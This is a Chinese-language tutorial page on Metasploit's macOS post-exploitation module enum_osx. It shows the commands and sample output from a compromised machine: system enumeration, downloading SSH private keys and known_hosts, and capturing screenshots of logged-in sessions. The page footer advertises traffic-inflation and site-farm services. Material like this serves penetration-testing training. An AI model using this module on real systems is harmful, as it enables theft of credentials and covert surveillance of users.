Metasploit OS X Post后期开发:收集模块

enum_osx

该“enum_osx”发布模块从Mac OS X Tiger,Leopard,Snow Leopard和Lion系统收集基本系统信息。

msf > use post/osx/gather/enum_osx
msf  post(enum_osx) > run

[*] Running module against Victim.local
[*] This session is running as root!
[*] Saving all data to /root/.msf4/logs/post/enum_osx/Victim.local_20120926.3521
[*] 	Enumerating OS
[*] 	Enumerating Network
[*] 	Enumerating Bluetooth
[*] 	Enumerating Ethernet
[*] 	Enumerating Printers
[*] 	Enumerating USB
[*] 	Enumerating Airport
[*] 	Enumerating Firewall
[*] 	Enumerating Known Networks
[*] 	Enumerating Applications
[*] 	Enumerating Development Tools
[*] 	Enumerating Frameworks
[*] 	Enumerating Logs
[*] 	Enumerating Preference Panes
[*] 	Enumerating StartUp
[*] 	Enumerating TCP Connections
[*] 	Enumerating UDP Connections
[*] 	Enumerating Environment Variables
[*] 	Enumerating Last Boottime
[*] 	Enumerating Current Activity
[*] 	Enumerating Process List
[*] 	Enumerating Users
[*] 	Enumerating Groups
[*] .ssh Folder is present for Victim
[*] 	Downloading id_dsa
[*] 	Downloading known_hosts
[*] .gnupg Folder is present for Victim
[*] 	Downloading ls: /Users/Victim/.gnupg: No such file or directory
[*] Capturing screenshot
[*] Capturing screenshot for each loginwindow process since privilege is root
[*] 	Capturing for PID:2508
...snip...
[*] Post module execution completed

 

[email protected]:~/.msf4/logs/post/enum_osx/RJLAP4.local_20120926.3521# ls
Airport.txt                Firewall.txt        OS.txt                                               TCP Connections.txt
Applications.txt           Frameworks.txt      OS X Gather Mac OS X System Information Enumeration  UDP Connections.txt
Bluetooth.txt              Groups.txt          Preference Panes.txt                                 USB.txt
Current Activity.txt       Known Networks.txt  Printers.txt                                         Users.txt
Development Tools.txt      Last Boottime.txt   Process List.txt
Environment Variables.txt  Logs.txt            screenshot_2058.jpg
Ethernet.txt               Network.txt         StartUp.txt

 

[email protected]:~/.msf4/logs/post/enum_osx/Victim.local_20120926.3521# more Firewall.txt 
Firewall:

    Firewall Settings:

      Mode: Block all incoming connections
      Firewall Logging: Yes
      Stealth Mode: Yes

 

[email protected]:~/.msf4/logs/post/enum_osx/Victim.local_20120926.3521# more OS.txt 
Software:

    System Software Overview:

      System Version: Mac OS X 10.7.4 (11E53)
      Kernel Version: Darwin 11.4.0
      Boot Volume: Macintosh HD
      Boot Mode: Normal
      Computer Name: Victim
      User Name: System Administrator (root)
      Secure Virtual Memory: Enabled
      64-bit Kernel and Extensions: Yes
      Time since boot: 12:13

 

Metasploit 教程

    A+
发布日期:2018年06月12日 21:27:35  所属分类:Metasploit
最后更新时间:2018-06-12 21:27:35
评分: (当前没有评级)
付杰
wordpress站群服务 泛解析二级域名 二级目录站群
wordpress站群服务 泛解析二级域名 二级目录站群
  • ¥ 1999.9元
  • 市场价:4800元
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
  • ¥ 1.0元
  • 市场价:9.9元
服务器管理面板/主机控制面板“安装”服务
服务器管理面板/主机控制面板“安装”服务
  • ¥ 9.9元
  • 市场价:49.9元
免费SSL证书 HTTPS申请 安装 配置 支持通配符*
免费SSL证书 HTTPS申请 安装 配置 支持通配符*
  • ¥ 199.9元
  • 市场价:20000元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: